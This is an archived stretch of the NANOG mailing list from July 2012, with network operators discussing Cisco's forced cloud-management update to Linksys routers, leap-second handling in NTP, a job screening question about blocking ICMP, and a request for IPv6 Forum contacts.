<24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for it's consumer level routers. http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service -Mario Eirea -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 6882 bytes Desc: not available URL: From roll at Stupi.SE Thu Jul 5 17:54:05 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 17:54:05 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF51C67.2080709@gmail.com> Message-ID: > Rather than discussing the pros and cons of UTC and leap seconds, just > create your own time system. > > You could call it OpenTime. OpenTime will use NTP servers where the > Stratum 1 servers are synced to some time standard that doesn't care > about leap seconds. That way the consumer can chose to connect his > machines to UTC or OpenTime. And what do you do if "OpenTime" and "UTC" differs so that it matters? Do the fligt leave at 1200 UTC or 1200 OpenTime? Most countries have a law that says something like "measurement is to be traceable to a national standard" for legal and trade use. (weight, mass, volume, current, time ...). For those who don't knew, none of the national labs that have local representation of UTC have the EXACT same time. So if there is a dispute you need to be able to show traceability to YOUR national lab. -P From hank at efes.iucc.ac.il Thu Jul 5 11:08:11 2012 From: hank at efes.iucc.ac.il (Hank Nussbacher) Date: Thu, 05 Jul 2012 19:08:11 +0300 Subject: Cisco Update In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> At 15:51 05/07/2012 +0000, Mario Eirea wrote: >Has anyone seen this yet? Looks like Cisco was forcing people to join its >Cloud service through an update for it's consumer level routers. > >http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service > >-Mario Eirea For those of us who have not kept up with every latest feature that Cisco rolls out across all its platforms, can someone explain this new service? Is it like Windows update, where Cisco will auto-update your router s/w and thereby brick it? If I don't register my router with Cisco, what do I lose? I can't update it manually? -Hank From jgreco at ns.sol.net Thu Jul 5 10:24:09 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Thu, 5 Jul 2012 10:24:09 -0500 (CDT) Subject: Cisco Update In-Reply-To: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> Message-ID: <201207051524.q65FO9n3079600@aurora.sol.net> > At 15:51 05/07/2012 +0000, Mario Eirea wrote: > >Has anyone seen this yet? Looks like Cisco was forcing people to join its > >Cloud service through an update for it's consumer level routers. > > > >http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service > > > >-Mario Eirea > > For those of us who have not kept up with every latest feature that Cisco > rolls out across all its platforms, can someone explain this new > service? Is it like Windows update, where Cisco will auto-update your > router s/w and thereby brick it? If I don't register my router with Cisco, > what do I lose? I can't update it manually? And what happens when your *cough* "router" isn't actually on the Internet? How can it be managed and upgraded on a regular old network? ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From sean at seanharlow.info Thu Jul 5 11:26:15 2012 From: sean at seanharlow.info (Sean Harlow) Date: Thu, 5 Jul 2012 12:26:15 -0400 Subject: Cisco Update In-Reply-To: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> References: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> Message-ID: <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info> On Jul 5, 2012, at 12:08, Hank Nussbacher wrote: > For those of us who have not kept up with every latest feature that Cisco rolls out across all its platforms, can someone explain this new service? Is it like Windows update, where Cisco will auto-update your router s/w and thereby brick it? If I don't register my router with Cisco, what do I lose? I can't update it manually? Long story short, the affected routers (newer "Cisco" [former Linksys] consumer products) received an automatic firmware update which basically disables the device's onboard web UI and forces you to use Cisco's "cloud" management system. The biggest issue with this is that apparently it has some function, possibly for web filtering, which sends network traffic information of some sort to Cisco's service. They also state that regardless of the auto-update setting a device may be updated anyways if Cisco says so. One article I found says it affects the E2700, E3500, and E4500 models. From sean at seanharlow.info Thu Jul 5 11:35:23 2012 From: sean at seanharlow.info (Sean Harlow) Date: Thu, 5 Jul 2012 12:35:23 -0400 Subject: Cisco Update In-Reply-To: <201207051524.q65FO9n3079600@aurora.sol.net> References: <201207051524.q65FO9n3079600@aurora.sol.net> Message-ID: <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> On Jul 5, 2012, at 11:24, Joe Greco wrote: > And what happens when your *cough* "router" isn't actually on the > Internet? How can it be managed and upgraded on a regular old network? If there is no internet connection, you get a very limited page that's apparently only really good to get you back online. From owen at delong.com Thu Jul 5 11:33:05 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 09:33:05 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> Message-ID: >> > > I'm only at (aproxamately) 42.28755874876601 north. Once you go near 60 north the value changes significantly. > > There is a band of latitudes where it does make more sense. Why punish the rest of us to accommodate a few people who live between about 50? and 55? latitude? Owen From jlewis at lewis.org Thu Jul 5 11:42:57 2012 From: jlewis at lewis.org (Jon Lewis) Date: Thu, 5 Jul 2012 12:42:57 -0400 (EDT) Subject: Cisco Update In-Reply-To: <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> References: <201207051524.q65FO9n3079600@aurora.sol.net> <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> Message-ID: On Thu, 5 Jul 2012, Sean Harlow wrote: > On Jul 5, 2012, at 11:24, Joe Greco wrote: > >> And what happens when your *cough* "router" isn't actually on the >> Internet? How can it be managed and upgraded on a regular old network? > > If there is no internet connection, you get a very limited page that's apparently only really good to get you back online. Routers are sometimes used on networks that don't have internet connectivity [by design]. This seems amazingly short-sighted for a company that's been around selling routing gear as long as cisco. ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From sean at seanharlow.info Thu Jul 5 11:48:48 2012 From: sean at seanharlow.info (Sean Harlow) Date: Thu, 5 Jul 2012 12:48:48 -0400 Subject: Cisco Update In-Reply-To: References: <201207051524.q65FO9n3079600@aurora.sol.net> <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> Message-ID: <2426C9B2-22F7-4B25-909D-51B98CD35F4B@seanharlow.info> On Jul 5, 2012, at 12:42, Jon Lewis wrote: > Routers are sometimes used on networks that don't have internet connectivity [by design]. This seems amazingly short-sighted for a company that's been around selling routing gear as long as cisco. Not to defend Cisco's idiotic decision, but in this case the devices in question are extremely unlikely to be used in such a situation as they are consumer/SOHO products. The vast, overwhelming majority of these will be installed as the primary and/or only piece of network hardware other than the modem. I'd imagine that anyone who knows enough to care about a non-connected situation was never considering these devices in the first place. Frankly for the Joe Sixpack market I can't argue against the autoupdate idea itself, as outdated consumer routers probably account for a large percentage of the exploitable Linux systems out there, but the "cloud" tie in and privacy issues are clearly not well thought out. From bicknell at ufp.org Thu Jul 5 11:49:03 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Thu, 5 Jul 2012 09:49:03 -0700 Subject: Cisco Update In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: <20120705164903.GA10480@ussenterprise.ufp.org> In a message written on Thu, Jul 05, 2012 at 03:51:40PM +0000, Mario Eirea wrote: > Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for it's consumer level routers. Perhaps going right to the source would be educational: http://home.cisco.com/en-us/cloud The short version appears to be Cisco wanted to move to a model where you could manage your home gateway remotely, and also store settings that may (in the future) be able to be reused if you replaced your device. All in all it sounds a lot to me like Meraki's solution (caveta, I've not used Meraki, just gotten the presentation). There's probably even a market for this sort of service. Where they appear to have gone horribly wrong is that several models of Linksys routers with "auto-update" enabled downloaded this update and moved to this new management model with no user intervention, notice, or method of being down graded. Thus folks who didn't want these features and may not have upgraded to them were caught by surprise, and have been effectively forced to take the new features due to a lack of downgrade path. Technology wise it's pretty non-interesting. Others have been doing similar things. From a customer relations point of view it's a total disaster, and one that should have been entirely predictable. I was never much of a fan of Linksys pre-Cisco, but post-Cisco it seems to be in a non-stop downhill slide... -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From ed at edgeoc.net Thu Jul 5 11:49:18 2012 From: ed at edgeoc.net (Edward Salonia) Date: Thu, 5 Jul 2012 16:49:18 +0000 Subject: Cisco Update Message-ID: <359105651-1341506959-cardhu_decombobulator_blackberry.rim.net-744118490-@b2.c2.bise6.blackberry> Let's remember, this is regarding Cisco's consumer grade routers (formerly linksys) which are primarily intended for connecting small networks (homes, offices) to the internet over some type of broadband connection. Can they be used. On a network with no internet connectivity? Sure. But this, as I'm sure many will agree, is not the environment in which they were intended to be deployed. Nor do I believe are they marketed as such. - Ed ------Original Message------ From: Jon Lewis To: Sean Harlow Cc: nanog at nanog.org Subject: Re: Cisco Update Sent: Jul 5, 2012 12:42 PM On Thu, 5 Jul 2012, Sean Harlow wrote: > On Jul 5, 2012, at 11:24, Joe Greco wrote: > >> And what happens when your *cough* "router" isn't actually on the >> Internet? How can it be managed and upgraded on a regular old network? > > If there is no internet connection, you get a very limited page that's apparently only really good to get you back online. Routers are sometimes used on networks that don't have internet connectivity [by design]. This seems amazingly short-sighted for a company that's been around selling routing gear as long as cisco. ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From dhubbard at dino.hostasaurus.com Thu Jul 5 11:55:54 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Thu, 5 Jul 2012 12:55:54 -0400 Subject: Cisco Update References: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info> Message-ID: Technical users could always just flash DD-WRT onto the device and replace the Linksys/Cisco firmware; then you have a much more robust system without any big brother stuff. From bill at herrin.us Thu Jul 5 12:02:08 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 13:02:08 -0400 Subject: job screening question Message-ID: Hi folks, I gave my HR folks a screening question to ask candidates for an IP expert position. I've gotten some "unexpected" answers, so I want to do a sanity check and make sure I'm not asking something unreasonable. And by "unexpected" I don't mean naively incorrect answers, I mean oh-my-God-how-did-you-get-that-cisco-certification answers. The question was: You implement a firewall on which you block all ICMP packets. What part of the TCP protocol (not IP in general, TCP specifically) malfunctions as a result? My questions for you are: 1. As an expert who follows NANOG, do you know the answer? Or is this question too hard? 2. Is the question too vague? Is there a clearer way to word it? 3. Is there a better screening question I could pass to HR to ask and check the candidate's response against the supplied answer? Thanks, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From jared at puck.nether.net Thu Jul 5 12:07:04 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 13:07:04 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> Message-ID: <20120705170704.GA19613@puck.nether.net> On Thu, Jul 05, 2012 at 09:33:05AM -0700, Owen DeLong wrote: > >> > > > > I'm only at (aproxamately) 42.28755874876601 north. Once you go near 60 north the value changes significantly. > > > > There is a band of latitudes where it does make more sense. > > Why punish the rest of us to accommodate a few people who live between about 50? and 55? latitude? (easier typing with a real keyboard)... This is a local/states rights issue imho :) AZ ignores DST and as a result I never know what time it is there ;) This is a local state-by-state and county-by-county issue as evidenced by the behavior of counties in Indiana that are close to or within the Chicago MSA. This is more a social issue than anything else. Many people prefer some daylight when they are not working. - Jared -- Jared Mauch | pgp key available via finger from jared at puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. From straterra at fuhell.com Thu Jul 5 12:08:30 2012 From: straterra at fuhell.com (Thomas York) Date: Thu, 5 Jul 2012 13:08:30 -0400 Subject: job screening question In-Reply-To: References: Message-ID: <153f01cd5ad0$cdeaffc0$69c0ff40$@fuhell.com> My answer to that questionwould be "No..why would I ever blanket block ICMP? If I'm that stupid, I shouldn't be deploying firewalls at all." I also assume I wouldn't get the job after answering that... Thomas York -----Original Message----- From: William Herrin [mailto:bill at herrin.us] Sent: Thursday, July 05, 2012 1:02 PM To: nanog at nanog.org Subject: job screening question Hi folks, I gave my HR folks a screening question to ask candidates for an IP expert position. I've gotten some "unexpected" answers, so I want to do a sanity check and make sure I'm not asking something unreasonable. And by "unexpected" I don't mean naively incorrect answers, I mean oh-my-God-how-did-you-get-that-cisco-certification answers. The question was: You implement a firewall on which you block all ICMP packets. What part of the TCP protocol (not IP in general, TCP specifically) malfunctions as a result? My questions for you are: 1. As an expert who follows NANOG, do you know the answer? Or is this question too hard? 2. Is the question too vague? Is there a clearer way to word it? 3. Is there a better screening question I could pass to HR to ask and check the candidate's response against the supplied answer? Thanks, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 7086 bytes Desc: not available URL: From oliver at g.garraux.net Thu Jul 5 12:11:38 2012 From: oliver at g.garraux.net (Oliver Garraux) Date: Thu, 5 Jul 2012 13:11:38 -0400 Subject: job screening question In-Reply-To: References: Message-ID: Seems fairly straightforward to me. It'll break path MTU discovery. I would hope someone applying for an "IP expert" position would know that. Could HR be mangling the question or something? Oliver ------------------------------------- Oliver Garraux Check out my blog: www.GetSimpliciti.com/blog Follow me on Twitter: twitter.com/olivergarraux On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > From wp at null0.nl Thu Jul 5 12:11:58 2012 From: wp at null0.nl (Wouter Prins) Date: Thu, 5 Jul 2012 19:11:58 +0200 Subject: ipv6forum.com/nav6.org contacts Message-ID: hi all, Is there anyone active on this list who is actively working on/at ipv6forum.com/nav6.org? I tried to contact both administrative and technical contacts listed under the domain, but no response so far. Please unicast me in case you do. :) Thanks in advance! -- Wouter Prins wp at null0.nl From bicknell at ufp.org Thu Jul 5 12:16:56 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Thu, 5 Jul 2012 10:16:56 -0700 Subject: job screening question In-Reply-To: References: Message-ID: <20120705171656.GA11490@ussenterprise.ufp.org> In a message written on Thu, Jul 05, 2012 at 01:02:08PM -0400, William Herrin wrote: > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? I suspect you're looking for Path MTU Discovery as an answer. > 2. Is the question too vague? Is there a clearer way to word it? I believe if you understand ICMP, it could be considered to be vague. For instance, blocking all ICMP means that if the network breaks during communication and a Host/Net unreachable is generated the connection will have to go through a timeout rather than an immeidate tear down. Similarly, blocking ICMP source quench might break throttling in the 3 TCP implementations in the world that do that. :) > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? "A firewall is configured to block all ICMP packets and a system administrator reports problems with TCP connections not transferring data. What is the most likely cause?" ICMP Packet-Too-Big being dropped and breaking PMTU discovery is the correct answer. When I study for my CCIE Recert every 2 years I find myself relearning "The Cisco Answer", rather than the right answer. It's not that the Cisco answers are often wrong per-se, but they teach the most likely causes of things and want them back as the right answer. Cribbing from their test materials and study guides puts the questions in familar terms that your candidates are likely to have seen, making them less likely to be thrown off by the question. Unless you want to throw them off. Depends on the level of folks you want to hire. I would answer your question with "I would never implement a firewall that breaks all TCP." :) -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From david at davidcoulson.net Thu Jul 5 12:16:49 2012 From: david at davidcoulson.net (David Coulson) Date: Thu, 05 Jul 2012 13:16:49 -0400 Subject: job screening question In-Reply-To: References: Message-ID: <4FF5CC01.6010504@davidcoulson.net> That's a horrible question for a non-technical HR person to pose to a candidate - It's impossible for the candidate to ask clarifying questions to make sure they understand what you are looking for, plus you may have a strong candidate who gets it wrong (for whatever reason), but if they were talking to a technical person you would realize they were 99% of the way there. What if they said "it would cause the generation of port-unreachable ICMP packets to cease, and applications may hang until they timeout"? Not the answer you're looking for, but not wrong either. I leave HR to their standard screening stuff, and do the technical part myself. Less chance to skip over a good candidate, even if it takes a bit longer in the whole process. On 7/5/12 1:02 PM, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > From jmkeller at houseofzen.org Thu Jul 5 12:18:44 2012 From: jmkeller at houseofzen.org (James M Keller) Date: Thu, 05 Jul 2012 13:18:44 -0400 Subject: job screening question In-Reply-To: References: Message-ID: <4FF5CC74.7060006@houseofzen.org> On 7/5/2012 1:11 PM, Oliver Garraux wrote: > Seems fairly straightforward to me. It'll break path MTU discovery. > > I would hope someone applying for an "IP expert" position would know that. > > Could HR be mangling the question or something? > > Oliver > > ------------------------------------- > > Oliver Garraux > Check out my blog: www.GetSimpliciti.com/blog > Follow me on Twitter: twitter.com/olivergarraux > > > On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: >> Hi folks, >> >> I gave my HR folks a screening question to ask candidates for an IP >> expert position. I've gotten some "unexpected" answers, so I want to >> do a sanity check and make sure I'm not asking something unreasonable. >> And by "unexpected" I don't mean naively incorrect answers, I mean >> oh-my-God-how-did-you-get-that-cisco-certification answers. >> >> The question was: >> >> You implement a firewall on which you block all ICMP packets. What >> part of the TCP protocol (not IP in general, TCP specifically) >> malfunctions as a result? >> >> >> My questions for you are: >> >> 1. As an expert who follows NANOG, do you know the answer? Or is this >> question too hard? >> >> 2. Is the question too vague? Is there a clearer way to word it? >> >> 3. Is there a better screening question I could pass to HR to ask and >> check the candidate's response against the supplied answer? >> >> Thanks, >> Bill Herrin >> >> >> -- >> William D. Herrin ................ herrin at dirtside.com bill at herrin.us >> 3005 Crane Dr. ...................... Web: >> Falls Church, VA 22042-3004 >> > You would be surprised by some of the people I get off the street applying for senior network engineering positions who couldn't connect up a SOHO router and a dumb switch and make them work, let alone understand how PMTU discovery works. -- --- James M Keller From djahandarie at gmail.com Thu Jul 5 12:20:19 2012 From: djahandarie at gmail.com (Darius Jahandarie) Date: Thu, 5 Jul 2012 13:20:19 -0400 Subject: job screening question In-Reply-To: References: Message-ID: On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: > Seems fairly straightforward to me. ?It'll break path MTU discovery. Since Bill said "(not IP in general, TCP specifically)", I don't think PMTUD breaking is what he's looking for. I'd venture more along the lines of lack of Destination Unreachables making things hang. -- Darius Jahandarie From davehart at gmail.com Thu Jul 5 12:23:32 2012 From: davehart at gmail.com (Dave Hart) Date: Thu, 5 Jul 2012 17:23:32 +0000 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com> Message-ID: On Wed, Jul 4, 2012 at 17:22 UTC, Scott Howard wrote: > On Wed, Jul 4, 2012 at 8:50 AM, Jimmy Hess wrote: > >> The NTP daemon could still provide a configuration option to not >> implement leap-seconds locally, or ignore the leap-second >> announcement received. So the admin can make a tradeoff favoring >> Stability over Correctness, of _allowing_ the local clock to become 1 >> second inaccurate for a short time after the rare occasion of a leap >> second; and step it or slew the local clock, eg include the leap >> second in the ordinary time correction, averaged over a period of >> time instead of a 1 second jump. >> > > Unless I'm mis-reading things, it already does - of sorts. I hope anyone implementing systems that depend on minutae of leap seconds does not rely solely on your reading, but actually tests by inconveniently setting their clock and ntpd leapfile to actually insert a leap second. > According to the ntpd website ( > http://www.ntp.org/ntpfaq/NTP-s-algo-real.htm#AEN2499) : That FAQ is woefully out of date. http://support.ntp.org/ has more current information. The best reference for a given ntpd version is the html docs included in the tarball for that version. Some widely-used versions' html documentation is archived at http://doc.ntp.org/ > *The theory of leap seconds in explained in Q: 2.4.. In reality there are > two cases to consider: > > If the operating system implements the kernel discipline described in > Section 5.2, ntpd will announce insertion and deletion of leap seconds to > the kernel. The kernel will handle the leap seconds without further action > necessary. But exactly how it handles it is up to the kernel. Linux and FreeBSD essentially step the clock backward 1s at 23:59:60.0 UTC. At least one system (I believe it was NetBSD or OpenBSD) instead stalls the clock for 1s, though each reading of the clock during that period is greater than the prior, the delta is microscopic and not related to elapsed time within that second, but simply preserves ordering of events. Dr. Mills attempted to exhort kernel developers to implement leap seconds while keeping the system time ever-increasing, but that advice was largely ignored because of implementation difficulty. For example, when first considered, NTP kernel extensions had microsecond precision. The approach of adding a tiny amount with each reading would open the system up to problems if apps could read the clock more than 1 million times during the leap second. It's also ugly for a SMP kernel to maintain global state on the last clock reading across processors. Most systems offer a monotonic alternative to the wall clock, typically implemented as an uptime counter in nominal SI seconds (nominal as defined by hardware, as the monotonic clock is _not_ disciplined by ntpd or affected by steps (setting the wall clock to a particular value). Look for CLOCK_MONOTONIC in the documentation of clock_gettime. There are also interval-only timer facilities like timer_settime. The tools are at hand for those who understand the implications of clock steps (which can occur under circumstances other than leap seconds). > If the operating system does not implement the kernel discipline, the > clock will show an error of one second relative to NTP's time immediate > after the leap second. The situation will be handled just like an > unexpected change of time: The operating system will continue with the > wrong time for some time, but eventually ntpd will step the time. > Effectively this will cause the correction for leap seconds to be applied > too late. > * This is the historic behavior of ntpd, but after years of complaints, it was changed. ntpd 4.2.6 and later step the clock backward 1s at the scheduled insertion if using the daemon loop discipline (as opposed to the kernel loop discipline). > Linux does implement the "kernel discipline" (via ntp_adjtime), so the > first option is what normally happens. However you can disable this with > an ntpd config option ("disable kernel") or via ntpdc at which point I'm > presuming it will fall back to the second option. > > The second option still gives you a step, but using the -x option to NTPD > will slew this step, giving a gradual correction to the 1 second difference. That is incorrect. -x is often misunderstood -- it does not disable stepping entirely, it raises the "step threshold" from 0.128s default to 600s. When ntpd synchronizes the clock and determines the offset exceeds the step threshold, the clock is stepped to the correct time. So long as you manage to keep your clock within 10 minutes of correct, -x isn't terribly different from disabling steps, but that's not what it does. In particular, when ntpd using the daemon loop implements a leap second by stepping the clock backward one second, the step threshold (and hence -x) are not a decision factor -- the step is taken. Cheers, Dave Hart From r.engehausen at gmail.com Thu Jul 5 12:26:22 2012 From: r.engehausen at gmail.com (Roy) Date: Thu, 05 Jul 2012 10:26:22 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: <4FF5CE3E.6060603@gmail.com> On 7/5/2012 5:54 PM, Peter Lothberg wrote: >> Rather than discussing the pros and cons of UTC and leap seconds, just >> create your own time system. >> >> You could call it OpenTime. OpenTime will use NTP servers where the >> Stratum 1 servers are synced to some time standard that doesn't care >> about leap seconds. That way the consumer can chose to connect his >> machines to UTC or OpenTime. > And what do you do if "OpenTime" and "UTC" differs so that it matters? > > Do the fligt leave at 1200 UTC or 1200 OpenTime? > > ... Lets see. There have been nine leap seconds in 20 years. So at the start of the next century the difference will probably be less than a minute Remember OpenTime is only for people who want their system clocks to ignore leap seconds. I don't include myself among the possible users of OpenTime. From jeroen at unfix.org Thu Jul 5 12:27:40 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Thu, 05 Jul 2012 19:27:40 +0200 Subject: ipv6forum.com/nav6.org contacts In-Reply-To: References: Message-ID: <4FF5CE8C.6090502@unfix.org> On 2012-07-05 19:11 , Wouter Prins wrote: > hi all, > > Is there anyone active on this list who is actively working on/at > ipv6forum.com/nav6.org? > I tried to contact both administrative and technical contacts listed > under the domain, but no response so far. Latif Ladid is the right person for all of it who should be able to put you in touch with the right person for doing what you want to do. Greets, Jeroen From nick at flhsi.com Thu Jul 5 12:28:40 2012 From: nick at flhsi.com (Nick Olsen) Date: Thu, 5 Jul 2012 13:28:40 -0400 Subject: job screening question Message-ID: <792371be$38c50419$2bae7501$@flhsi.com> +1 I have people waive the "I'm Cisco Certified" flag in my face all the time. Then proceed to ask me if we have a T1. To the point that it's no longer a valuable achievement in my eyes. I'm certified to perform CPR in the state of Florida... I should go apply for a surgeon position at the local hospital. Nick Olsen Network Operations (855) FLSPEED x106 ---------------------------------------- From: "James M Keller" Sent: Thursday, July 05, 2012 1:19 PM To: "Oliver Garraux" , nanog at nanog.org Subject: Re: job screening question On 7/5/2012 1:11 PM, Oliver Garraux wrote: > Seems fairly straightforward to me. It'll break path MTU discovery. > > I would hope someone applying for an "IP expert" position would know that. > > Could HR be mangling the question or something? > > Oliver > > ------------------------------------- > > Oliver Garraux > Check out my blog: www.GetSimpliciti.com/blog > Follow me on Twitter: twitter.com/olivergarraux > > > On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: >> Hi folks, >> >> I gave my HR folks a screening question to ask candidates for an IP >> expert position. I've gotten some "unexpected" answers, so I want to >> do a sanity check and make sure I'm not asking something unreasonable. >> And by "unexpected" I don't mean naively incorrect answers, I mean >> oh-my-God-how-did-you-get-that-cisco-certification answers. >> >> The question was: >> >> You implement a firewall on which you block all ICMP packets. What >> part of the TCP protocol (not IP in general, TCP specifically) >> malfunctions as a result? >> >> >> My questions for you are: >> >> 1. As an expert who follows NANOG, do you know the answer? Or is this >> question too hard? >> >> 2. Is the question too vague? Is there a clearer way to word it? >> >> 3. Is there a better screening question I could pass to HR to ask and >> check the candidate's response against the supplied answer? >> >> Thanks, >> Bill Herrin >> >> >> -- >> William D. Herrin ................ herrin at dirtside.com bill at herrin.us >> 3005 Crane Dr. ...................... Web: >> Falls Church, VA 22042-3004 >> > You would be surprised by some of the people I get off the street applying for senior network engineering positions who couldn't connect up a SOHO router and a dumb switch and make them work, let alone understand how PMTU discovery works. -- --- James M Keller From bill at herrin.us Thu Jul 5 12:35:17 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 13:35:17 -0400 Subject: job screening question In-Reply-To: <4FF5CC01.6010504@davidcoulson.net> References: <4FF5CC01.6010504@davidcoulson.net> Message-ID: On Thu, Jul 5, 2012 at 1:16 PM, David Coulson wrote: > That's a horrible question for a non-technical HR person to pose to a > candidate - It's impossible for the candidate to ask clarifying questions to > make sure they understand what you are looking for, plus you may have a > strong candidate who gets it wrong (for whatever reason), but if they were > talking to a technical person you would realize they were 99% of the way > there. What if they said "it would cause the generation of port-unreachable > ICMP packets to cease, and applications may hang until they timeout"? Not > the answer you're looking for, but not wrong either. Hi David, To clarify: I asked HR to forward me the candidate's answer along with their resume. Just in case of answers like that one. Which would be more than enough to proceed to a phone screen directly with me. Regards, Bill -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From david at davidcoulson.net Thu Jul 5 12:37:12 2012 From: david at davidcoulson.net (David Coulson) Date: Thu, 05 Jul 2012 13:37:12 -0400 Subject: job screening question In-Reply-To: References: <4FF5CC01.6010504@davidcoulson.net> Message-ID: <4FF5D0C8.5070502@davidcoulson.net> Bill- So, I'm curious, and others probably are too. What's the most popular 'wrong' answer? :) David On 7/5/12 1:35 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 1:16 PM, David Coulson wrote: >> That's a horrible question for a non-technical HR person to pose to a >> candidate - It's impossible for the candidate to ask clarifying questions to >> make sure they understand what you are looking for, plus you may have a >> strong candidate who gets it wrong (for whatever reason), but if they were 